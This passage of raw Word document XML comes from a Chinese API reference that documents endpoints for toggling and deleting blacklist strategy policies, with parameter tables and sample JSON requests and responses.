        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcRealmType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>srcAgentIds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ["628f27265aa65cab", "628f272b5aa65cac"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"id": "629dbf65c56dd50d10c9a984"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA641B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2433FF1F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CF027A"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="3C44963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59F07B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10F6F76E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7F008A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2948A84C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E4354A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68129B79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CE35BE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="74719A9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="636D321D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F287FD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FBC435F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="313CA824" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45451954" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E99073" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49573297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F0B4C62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="6F7E4D99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="449" w:name="_Toc115166297"/>
      <w:bookmarkStart w:id="450" w:name="修改黑名单策略开关"/>
      <w:bookmarkEnd w:id="448"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>修改黑名单策略开关</w:t>
      </w:r>
      <w:bookmarkEnd w:id="449"/>
    </w:p>
    <w:p w14:paraId="5B73EC7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0943F4F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/update-switch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F187541"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411"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="77E9191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856FED4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C7AD80A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FBEED59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AA43099" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35E40B16" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4473D049" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A0A4707" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6753AE75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1058B352" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B27A072" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="088A0A9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C5BE51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6722F361" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42DFB4CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>开启:1 关闭：0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5A4300F1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787FAFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "switchStatus":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B482CC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260A7925" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD63A48"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="34A62AC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786E50E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0DF82A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF6584B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="017C1065" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65C520E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="568B8E90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42E90BF2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12E7DB92" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F8D9F21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="471E5D73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F3ED69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="32CEBF64" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DF1E6B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>errorDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="019ED96C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4607C2F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40913FD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E"/>
    <w:p w14:paraId="1F4ACCC9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="451" w:name="_Toc115166298"/>
      <w:bookmarkStart w:id="452" w:name="删除策略接口"/>
      <w:bookmarkEnd w:id="450"/>
      <w:r>
        <w:t>删除策略接口</w:t>
      </w:r>
      <w:bookmarkEnd w:id="451"/>
    </w:p>
    <w:p w14:paraId="139EFEE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5D37C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-srv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/black-strategy/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>delete</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="55AF27A5"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630"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4E7BDCF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B90B87D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A025B31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07714118" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EDAE47A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4344608C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00D98006" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ids</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33111CCE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328ACE46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="121824B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3138AC92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664126C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ids</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"5fa27259dae9af8a"]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C792336" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E48D20A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>errorDesc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAEBA8D"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D1CE15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C3782DF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68A48212" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
